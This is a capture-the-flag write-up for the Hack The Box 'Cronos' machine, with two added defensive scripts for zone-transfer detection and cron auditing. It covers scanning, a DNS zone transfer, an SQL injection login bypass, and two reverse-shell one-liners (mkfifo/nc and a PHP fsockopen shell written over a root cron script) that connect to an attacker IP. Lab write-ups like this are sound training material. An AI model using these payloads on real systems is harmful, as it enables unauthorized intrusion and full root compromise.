Let’s get started!
The initial step is to scan for open services on the machine.
COMMAND: nmap -sC -sV -O -oA cronos 10.10.10.13
As you can see from the nmap scan above, 3 ports are open!
Let’s open the webpage.
We got the default Apache2 page !
Since we only get a default page when browsing to the page using the machine’s IP address, we may want to consider that there could be virtual host routing in play. If we edit our /etc/hosts file to add the machine’s name cronos.htb and then revisit the page we now get a different page:
COMMAND: echo "10.10.10.13 cronos.htb" >> /etc/hosts
Let’s revisit the page again!
The server is running the Laravel framework; we can do further enumeration with nikto and gobuster.
root@exp1o1t9r:~# gobuster dir -u http://cronos.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url: http://cronos.htb
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
2020-1-23 13:14:41 Starting gobuster
/js (Status: 301)
/css (Status: 301)
/server-status (Status: 403)
root@exp1o1t9r:~/htb/machines/cronos-10.10.10.13# nikto -h cronos.htb
- Nikto v2.1.6
+ Target IP: 10.10.10.13
+ Target Hostname: cronos.htb
+ Target Port: 80
+ Start Time: 2020-1-23 13:15:02 (GMT-5)
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie XSRF-TOKEN created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7785 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2019-12-25 13:20:45 (GMT-5) (343 seconds)
+ 1 host(s) tested
Since we’re not seeing anything jump out at us right away, now would be a good time to take a step back and review the other services we haven’t enumerated yet. Let’s explore DNS and see if we can do a zone transfer for the cronos.htb domain.
COMMAND: host -l cronos.htb 10.10.10.13
From the results above, we need to add all of these hosts to our hosts file.
echo "10.10.10.13 admin.cronos.htb" >> /etc/hosts
echo "10.10.10.13 ns1.cronos.htb" >> /etc/hosts
echo "10.10.10.13 www.cronos.htb" >> /etc/hosts
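From the defender's side, the zone transfer that just handed us every hostname is something a nameserver should only allow to its own secondaries, and it is cheap to spot when it happens. The script below is an added example, not part of the original writeup: it scans constructed BIND-style transfer log lines for AXFR/IXFR requests from clients outside an allowlist of secondary servers. The log format and the secondary address 10.10.10.20 are assumptions for the demo, and the named.conf snippet at the end shows the setting that would have stopped the transfer in the first place.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample lines approximating BIND's outbound transfer logging.
# The client addresses and timestamps are made up for this example.
SAMPLE_LOG = """\
23-Jan-2020 13:30:01.120 client 10.10.10.20#54231 (cronos.htb): transfer of 'cronos.htb/IN': AXFR started (serial 3)
23-Jan-2020 13:31:17.440 client 10.10.14.30#41122 (cronos.htb): transfer of 'cronos.htb/IN': AXFR started (serial 3)
23-Jan-2020 13:31:17.452 client 10.10.14.30#41122 (cronos.htb): transfer of 'cronos.htb/IN': AXFR ended
23-Jan-2020 13:32:05.001 client 10.10.14.31#39010 (cronos.htb): transfer of 'cronos.htb/IN': IXFR started
"""

# Matches the "transfer ... started" line, with or without the "@0x..."
# client handle newer BIND versions print. Assumed format: adjust it to the
# logging channel configured in your named.conf if it differs.
XFER_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9.]+)#\d+ \([^)]*\): "
    r"transfer of '(?P<zone>[^/']+)/IN': (?P<kind>AXFR|IXFR) started"
)

# Hosts legitimately allowed to pull the zone (constructed: one secondary).
ALLOWED_TRANSFER_NETS = [ip_network("10.10.10.20/32")]

# The corresponding hardening in BIND: restrict transfers to the secondaries
# instead of leaving them open to any client (constructed zone stanza).
RECOMMENDED_ZONE_CONFIG = """\
zone "cronos.htb" {
    type master;
    file "/etc/bind/db.cronos.htb";
    allow-transfer { 10.10.10.20; };
};
"""


def find_unauthorized_transfers(log_text, allowed_nets=ALLOWED_TRANSFER_NETS):
    """Return one finding per zone transfer started by a non-allowlisted client."""
    findings = []
    for line in log_text.splitlines():
        m = XFER_RE.search(line)
        if not m:
            continue
        client = ip_address(m.group("ip"))
        if any(client in net for net in allowed_nets):
            continue
        findings.append({"client": str(client),
                         "zone": m.group("zone"),
                         "kind": m.group("kind")})
    return findings


if __name__ == "__main__":
    for f in find_unauthorized_transfers(SAMPLE_LOG):
        print(f"ALERT: {f['kind']} of {f['zone']} pulled by {f['client']}")
    print("Recommended zone configuration:\n" + RECOMMENDED_ZONE_CONFIG)
```

The "AXFR ended" line is deliberately ignored so a completed transfer is reported once, on its start line; IXFR is included because an incremental transfer from an unknown client is just as informative to an attacker.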
admin.cronos.htb looks very promising. Now that it is in /etc/hosts, let's navigate to it:
A login page; let's attempt to bypass it using SQL injection:
admin' or '1'='1
We logged in successfully; next we will try command injection to execute Linux commands!
Command injection is possible, so we will use a reverse shell one-liner (mkfifo + nc):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.30 1234 >/tmp/f
BOOM! we got the shell !
Let's take a look at the crontab, since the machine name is CRONOS!!
COMMAND: cat /etc/crontab
By checking the crontab we know that artisan is running as root!
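A root cron job is only a problem when a lower-privileged user can change what it runs, which is exactly the situation here. As an added example (not part of the original writeup), the audit script below parses system-crontab lines and flags root jobs whose script files are owned by a non-root user or are group/world writable. The crontab text is constructed to resemble a Laravel scheduler entry, and the ownership data is a fake stat table (artisan owned by uid 33, i.e. www-data on Debian/Ubuntu) so the demo runs anywhere; pass the default `os.stat` to audit a real host.

```python
import os
import stat
from collections import namedtuple

# Constructed /etc/crontab contents; the box's real file is not reproduced.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""

FakeStat = namedtuple("FakeStat", "st_uid st_mode")

# Constructed ownership/mode data standing in for os.stat() results.
DEMO_STATS = {
    "/var/www/laravel/artisan": FakeStat(33, stat.S_IFREG | 0o755),  # www-data
    "/usr/bin/php": FakeStat(0, stat.S_IFREG | 0o755),                # root
}


def demo_stat(path):
    if path not in DEMO_STATS:
        raise FileNotFoundError(path)
    return DEMO_STATS[path]


def parse_system_crontab(text):
    """Return (user, command) for each job line of a system crontab."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                         # blank, comment, or VAR=value
        if line.startswith("@"):             # @reboot/@daily form: 3 fields
            fields = line.split(None, 2)
        else:                                # m h dom mon dow user command
            fields = line.split(None, 6)
        if len(fields) == 3 and line.startswith("@"):
            jobs.append((fields[1], fields[2]))
        elif len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs


def writable_by_nonroot(path, stat_fn=os.stat):
    """True for a regular file owned by non-root or group/world writable."""
    try:
        st = stat_fn(path)
    except FileNotFoundError:
        return False
    if not stat.S_ISREG(st.st_mode):
        return False                         # skip dirs and devices like /dev/null
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(text, stat_fn=os.stat):
    """Return (path, command) for every root job touching a modifiable file."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for token in command.split():
            if token.startswith("/") and writable_by_nonroot(token, stat_fn):
                findings.append((token, command))
    return findings


if __name__ == "__main__":
    for path, command in audit(SAMPLE_CRONTAB, demo_stat):
        print(f"root job runs modifiable file {path}: {command}")
```

The check is deliberately conservative: a path that does not exist or is not a regular file is ignored rather than reported, so redirect targets such as /dev/null do not produce noise. The fix on a host like this is to have root-run scripts owned by root with mode 0755 or tighter, or to run the scheduler as the web user instead of root.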
Let’s use the artisan and get the root shell:)
We need to replace the artisan file with a reverse shell and set up a netcat listener, as shown in the image below!
echo '<?php $sock=fsockopen("10.10.14.30",9999);exec("/bin/sh -i <&3 >&3 2>&3"); ?>' > /var/www/laravel/artisan
nc -nlvp 9999
Finally got the root shell and pwned the root flag:)
If you like my writeup, give me Respect on my HTB profile: Exp1o1t9r